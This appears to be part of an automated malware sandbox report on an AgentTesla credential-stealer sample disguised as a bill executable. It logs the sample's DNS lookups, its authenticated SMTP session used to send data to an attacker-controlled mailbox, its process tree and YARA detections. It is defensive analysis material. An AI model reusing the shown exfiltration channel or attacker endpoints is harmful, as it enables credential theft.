                                                                                                      Apr 12, 2021 15:18:09.803677082 CEST5776253192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:18:09.855288029 CEST53577628.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:18:13.240446091 CEST5543553192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:18:13.297455072 CEST53554358.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:18:29.325659990 CEST5071353192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:18:29.374316931 CEST53507138.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:18:41.811301947 CEST5613253192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:18:42.129463911 CEST53561328.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:18:44.853279114 CEST5898753192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:18:44.901916027 CEST53589878.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:18:47.035443068 CEST5657953192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:18:47.092525959 CEST53565798.8.8.8192.168.2.3

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                      Apr 12, 2021 15:18:41.811301947 CEST192.168.2.38.8.8.80x51ebStandard query (0)smtp.syntrnomh.comA (IP address)IN (0x0001)

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                      Apr 12, 2021 15:18:42.129463911 CEST8.8.8.8192.168.2.30x51ebNo error (0)smtp.syntrnomh.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                                                      Apr 12, 2021 15:18:42.129463911 CEST8.8.8.8192.168.2.30x51ebNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                      Apr 12, 2021 15:18:42.129463911 CEST8.8.8.8192.168.2.30x51ebNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                      Apr 12, 2021 15:18:42.129463911 CEST8.8.8.8192.168.2.30x51ebNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                      Apr 12, 2021 15:18:42.129463911 CEST8.8.8.8192.168.2.30x51ebNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)

                                                                                                      SMTP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                      Apr 12, 2021 15:18:42.875756979 CEST58749739208.91.199.225192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                      Apr 12, 2021 15:18:42.876359940 CEST49739587192.168.2.3208.91.199.225EHLO 134349
                                                                                                      Apr 12, 2021 15:18:43.050755024 CEST58749739208.91.199.225192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                      250-PIPELINING
                                                                                                      250-SIZE 41648128
                                                                                                      250-VRFY
                                                                                                      250-ETRN
                                                                                                      250-STARTTLS
                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                      250-AUTH=PLAIN LOGIN
                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                      250-8BITMIME
                                                                                                      250 DSN
                                                                                                      Apr 12, 2021 15:18:43.052225113 CEST49739587192.168.2.3208.91.199.225AUTH login cmFpbmllLndhbmdAc3ludHJub21oLmNvbQ==
                                                                                                      Apr 12, 2021 15:18:43.228472948 CEST58749739208.91.199.225192.168.2.3334 UGFzc3dvcmQ6
                                                                                                      Apr 12, 2021 15:18:43.407139063 CEST58749739208.91.199.225192.168.2.3235 2.7.0 Authentication successful
                                                                                                      Apr 12, 2021 15:18:43.407423019 CEST49739587192.168.2.3208.91.199.225MAIL FROM:<rainie.wang@syntrnomh.com>
                                                                                                      Apr 12, 2021 15:18:43.585530043 CEST58749739208.91.199.225192.168.2.3250 2.1.0 Ok
                                                                                                      Apr 12, 2021 15:18:43.585781097 CEST49739587192.168.2.3208.91.199.225RCPT TO:<rainie.wang@syntrnomh.com>
                                                                                                      Apr 12, 2021 15:18:43.771244049 CEST58749739208.91.199.225192.168.2.3250 2.1.5 Ok
                                                                                                      Apr 12, 2021 15:18:43.771477938 CEST49739587192.168.2.3208.91.199.225DATA
                                                                                                      Apr 12, 2021 15:18:43.946533918 CEST58749739208.91.199.225192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                      Apr 12, 2021 15:18:43.960582018 CEST49739587192.168.2.3208.91.199.225.
                                                                                                      Apr 12, 2021 15:18:44.231465101 CEST58749739208.91.199.225192.168.2.3250 2.0.0 Ok: queued as A9165781F07

                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      Analysis Process: BILL-OOO566876.exe PID: 1308 Parent PID: 5652

                                                                                                      General

                                                                                                      Start time:15:17:04
                                                                                                      Start date:12/04/2021
                                                                                                      Path:C:\Users\user\Desktop\BILL-OOO566876.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\Desktop\BILL-OOO566876.exe'
                                                                                                      Imagebase:0x7e0000
                                                                                                      File size:893952 bytes
                                                                                                      MD5 hash:1C84862E5B015BCECF6A194D17172DCF
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:low

                                                                                                      Analysis Process: BILL-OOO566876.exe PID: 1156 Parent PID: 1308

                                                                                                      General

                                                                                                      Start time:15:17:12
                                                                                                      Start date:12/04/2021
                                                                                                      Path:C:\Users\user\Desktop\BILL-OOO566876.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:{path}
                                                                                                      Imagebase:0x630000
                                                                                                      File size:893952 bytes
                                                                                                      MD5 hash:1C84862E5B015BCECF6A194D17172DCF
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:low

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >